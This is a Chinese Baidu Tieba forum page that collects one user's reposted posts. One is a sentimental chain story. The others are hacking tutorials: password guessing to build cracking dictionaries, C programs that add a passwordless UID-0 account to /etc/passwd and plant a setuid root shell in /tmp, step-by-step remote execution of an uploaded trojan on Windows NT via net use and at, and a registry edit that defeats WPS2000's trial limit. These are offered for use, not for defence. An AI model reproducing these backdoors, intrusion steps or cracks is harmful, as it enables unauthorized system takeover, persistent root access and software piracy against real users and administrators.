平山鸡蛋灌饼 平山鸡蛋灌饼
关注数: 0 粉丝数: 0 发帖数: 154 关注贴吧数: 0
你牛B看完别哭............. 看了必回 ! 一天,正走在路上,手机响了,话筒里是个稚嫩的小女孩的声音:“爸爸,你快回来吧,我好想你啊!”凭直觉,我知道又是个打错的电话,因为我女儿的声音我太熟悉了.。这年头发生此类事情也实在是不足为奇。我没好气的说了声:“打错了!”便挂断了电话。     接下来几天里,这个电话竟时不时地打过来,搅得我心烦,有时态度粗暴的回绝,有时干脆不接。     那天,这个电话又一次次打来,与往常不同的是,在我始终未接的情况下,那边一直在坚持不懈的拨打着。我终于耐住性子开始接听,还是那个女孩有气无力的声音:“爸爸,你快回来吧,我好想你啊!妈妈说这个电话没打错,是你的手机号码,爸爸我好疼啊!妈妈说你工作忙,天天都是她一个人在照顾我,都累坏了,爸爸我知道你很辛苦,如果来不了,你就在电话里再亲妞妞一次好吗?”孩子天真的要求不容我拒绝,我对着话筒响响地吻了几下,就听到孩子那边断断续续的声音:“谢谢……爸爸,我好……高兴,好……幸福……”      就在我逐渐对这个打错的电话发生兴趣时,接电话的不是女孩而是一个低沉的女声:“对不起,先生,这段日子一定给您添了不少麻烦,实在对不起!我本想处理完事情就给您打电话道歉的。这孩子的命很苦,生下来就得了骨癌,她爸爸不久前又……被一场车祸夺去了生命,我实在不敢把这个消息告诉她,每天的化疗,时时的疼痛,已经把孩子折磨得够可怜的了。当疼痛最让她难以忍受的时候,她嘴里总是呼喊着以前经常鼓励她要坚强的爸爸,我实在不忍心看孩子这样,那天就随便编了个手机号码……”      “那孩子现在怎么样了?”我迫不及待地追问。   “妞妞已经走了,您当时一定是在电话里吻了她,因为她是微笑着走的,临走时小手里还紧紧攥着那个能听到‘爸爸’声音的手机……” 感动了就回个帖子,就当是送那个小女孩的礼物! 请不要让帖子沉了,希望小女孩在天堂能看见这么多哥哥姐姐们还没有忘记她,而且在一直祝福她。我在这谢谢各位了
密码心理学 很多黑客的入门是从破解口令开始的!而是解密口令变成了由为重要的一门毕修课,今天我想谈的不是如何去破解口令,而是一篇关于口令的心理学文章!如果下述的一些列子正好与你的口令设置大同小异,那么请你马上改了它,你的口令被破解的可能性很大很大! 首先要说明的是许多root由于才用来口令保护的方法,当他的口令设置完之后,检测程序会自动提示,口另的不安全性,直到ROOT改成了没有规则的口令。所以对这些口令用口令心理学来分析是白费工夫了!我们主要针是对一些普通的用户! 当我们设定口令时一般的人都会用自己熟悉的单词,这样能使他们便于记忆!没办法,人天生就懒惰!那么哪些单词是他们容易记住的那!是不是没有规律呢?非也!非也!我们可以来做一个心理试验!试验是这样的我从大学中抽出了一百名学生,然后要他们写下二个单词!并告诉他们这个单词是用于电脑的口令非常重要,且将来的使用率也很高!要求他们尽量慎重考虑!好啦!我们来把测试结果分析一下吧!1,用自己的中文拼音者最多。37人这就告诉我们口令破解字典档应针对中国的特列!要用一些中文姓名拼音的字典档!如:wanghai ,zhangli,shenqin,等等!2,用常用的英文单词 23人其中许多人都用了很有特定意义的单词,如:hello,good,happy,anything,等等!3,用计算机的中经常出现的单词 18人这些单词中还有操作系统的命令,如:system,command,copy,harddisk,mouse,等等! 4,用自己的出生日期 7人其中年月日各不相同!但其中有3人用了中国常用的日期表示方法!如970203,199703.050498等!上述测试中两个单词相同的有21人,接近相同的有33人!虽然还有一些人用的我没给他们归类,但还是有规律的!希望上面的心理测试能给你的解密带来一写启示!而不要在盲目的用暴力法了!
“后门”技巧 本文的意旨是让你学会如何在完全控制系统后保留自己的根用户权限。这是黑客们非常热衷讨论的话题,但同时也应该是系统管理员们必须非常留意的。本文不可能列出所有的后门技巧,因为这些方法实在是太多了。但我会在文章中尽量解释那些通用的方法和技术。如果你作为(或者曾经作为)一名攻击者,花费了数周时间,才将一个帐号弄到手,但它的权限却实在可怜。这个系统据说非常安全,而你却希望能够更清楚地知道系统管理员究竟高明到什么程度。:) 于是你用尽了各种方法:IMAP、NIS、suid程序、错误的访问权限、进程竞争,等等,但仍然“不得其门而入”。最后,在一次偶然的情况下,你发现了系统管理员的一个小小失误,从而很快就获得了根用户权限。下一步要干什么呢?如何才能使你保留这个花费了如此长时间才完成的“艺术品”呢?[初级]最简单的方法,就是在口令文件 passwd 中增加一个 UID 为 0 的帐号。但最好别这么做,因为只要系统管理员检查口令文件就会“漏馅”了。以下是在 /etc/passwd 口令文件中添加一个 UID 0 帐号的C程序。<++> backdoor/backdoor1.c#include main(){FILE *fd;fd=fopen("/etc/passwd","a+");fprintf(fd,"hax0r::0:0::/root:/bin/sh\n");}<-->比这种方法稍微隐蔽一点的就是将藏在口令文件中某个无人使用帐号的 UID 改为 0,并将其第二个域(口令域)设为空。(注意,如果你使用的是较高版本的*nix,也许还要修改 /etc/shadow 文件。)在 /tmp 目录下放置 suid shell。以后只要你运行这个程序,就会轻易得到根用户权限。这种方法几乎是最受欢迎的了。但有许多系统每几小时,或者每次启动都会清除 /tmp 目录下的数据,另外一些系统则根本不允许运行 /tmp 目录下的 suid 程序。当然,你可以自己修改或清除这些限制(因为你已是根用户,有权限修改 /var/spool/cron/crontabs/root 和 /etc/fstab 文件)。以下是在 /tmp 目录下放置 suid shell 程序的C源程序。<++> backdoor/backdoor2.c#include main(){system("cp /bin/sh /tmp/fid");system("chown root.root /tmp/fid");system("chmod 4755 /tmp/fid");}<-->[中级]超级服务器守护进程(inetd)的配置文件。系统管理员一般情况下不经常检查该文件,因此这倒是个放置“后门”的好地方。:) 那么在这里如何建立一个最好的后门呢?当然是远程的了。这样你就不必需要本地帐号就可以成为根用户了。首先,让我们先来了解一下这方面的基础知识:inetd 进程负责监听各个TCP和UDP端口的连接请求,并根据连接请求启动相应的服务器进程。该配置文件 /etc/inetd.conf 很简单,基本形式如下:(1) (2) (3) (4) (5) (6) (7)ftp stream tcp nowait root /usr/etc/ftpd ftpdtalk dgram udp wait root /usr/etc/ntalkd ntalkdmountd/1 stream rpc/tcp wait root /usr/etc/mountd mountd1:第一栏是服务名称。服务名通过查询 /etc/services 文件(供 TCP 和 UDP 服务使用)或 portmap 守护进程(供 RPC 服务使用)映射成端口号。RPC(远程过程调用)服务由 name/num 的名字格式和第三栏中的 rpc 标志识别。2:第二栏决定服务使用的套接口类型:stream、dgram 或 raw。一般说来,stream 用于 TCP 服务,dgram 用于 UDP, raw 的使用很少见。3:第三栏标识服务使用的通信协议。允许的类型列在 protocols 文件中。协议几乎总是是 tcp 或 udp。RPC 服务在协议类型前冠以 rpc/。4:如果所说明的服务一次可处理多个请求(而不是处理一个请求后就退出),那么第四栏应置成 wait,这样可以阻止 inetd 持续地派生该守护进程的新拷贝。此选项用于处理大量的小请求的服务。如果 wait 不合适,那么在本栏中填 nowait。5:第五栏给出运行守护进程的用户名。6:第六栏给出守护进程的全限定路径名。
在一些入侵NT的教学里都有讲到执行程序的方法,我单独提出来写成贴
手把手教你NT入侵  在一些入侵NT的教学里都有讲到执行程序的方法,我单独提出来写成贴子可能是多余,但我还是希望对大家有用。操作系统平台:必须为NT,可以是WINNT4.0或5.0;WorkStation 或Server;还可以是WIN2000。 工具:Netsvc.exe 用于启动远程主机的schedule服务。 开始:开DOS窗口,输入net use \\ip 等等连接上目标主机。把木马上传到目标主机。建议放在你共享的所在目录,或系统目录WINNT下,执行时不用再输入程序所在路径。木马都有自我删除功能,所以一般不会被管理员发现。 上传木马后,键入: C:/>netsvc \\ip schedule /start 启动目标主机的schedule服务(schedule服务用来定时执行某程序,我们可利用它来执行木马程序)。这过程可能会持续较久,一定要等到提示符出现才进行下一步,不要急急忙忙关了窗口. 然后键入: C:/>net time \\ip 将显示目标主机的系统时间,如:14:43 记住这时间,接下来用AT命令往目标主机添加入定时启动木马程序的任务,键入: C:/>at \\ip 14:45 trojan.exe 注意:这里我启动时间定为14:45而不是14:43,往后推迟了几分钟,这是考虑到命令往返于两机需要一定的时间(中国的网络速度实在太慢啦!) 至此,你只要等稍等几分钟过去,就可以打开你的木马客户器控制目标主机了,也不用那么麻烦地执行程序啦!木马程序的路径要设定好
WPS2000限次版的破解 下载安装了WPS2000的限制版,不过它在第一次运行时就提示只能使用99次。在用了99次以后就会的一个提示框要提示已经到期了。请去购买云云。那么它的时间限制在那里呢?80%在注册表中。分析了一下发现HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion里的"W_P_S_Data"="5DFB2099-9668-11D0-B1EC-00C04DB2A0CA就是关键++------<这就是99次到期的标志,用了99次了!将它的值改为"W_P_S_Data"="5DFB2000-9668-11D0-B1EC-00C04DB2A0CA再运行WPS2000,又可以...如果一不小心,程序被破坏了,反安装。再安装WPS2000的限制版,坏了,不能安装了。不要紧。1。删除C:\WINDOWS\SYSTEM\WINWPS.DAT2. 运行REGEDIT.EXE 删除HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\下的"W_P_S_Data"="5DFB2099-9668-11D0-B1EC-00C04DB2A0CA3. 运行REGEDIT.EXE 删除HKEY_CURRENT_USER\Software\Kingsoft再重淅安装.一切OK!*另在HKEY_CURRENT_USER\Software\Kingsoft\WPS2000LE\Registration新建串值"User"="CHINA"你就会发现WPS 2000信息处出现本产品使用权属于:CHINA最后还是……希望有条件的还是去支持正版吧!WPS也算是能支持的极少数国产软件之一了。
举报 平山 吧 飞天摄影夏日外拍精彩呈现 http://post.baidu.com/f? 一看就是广告!删除!
1 下一页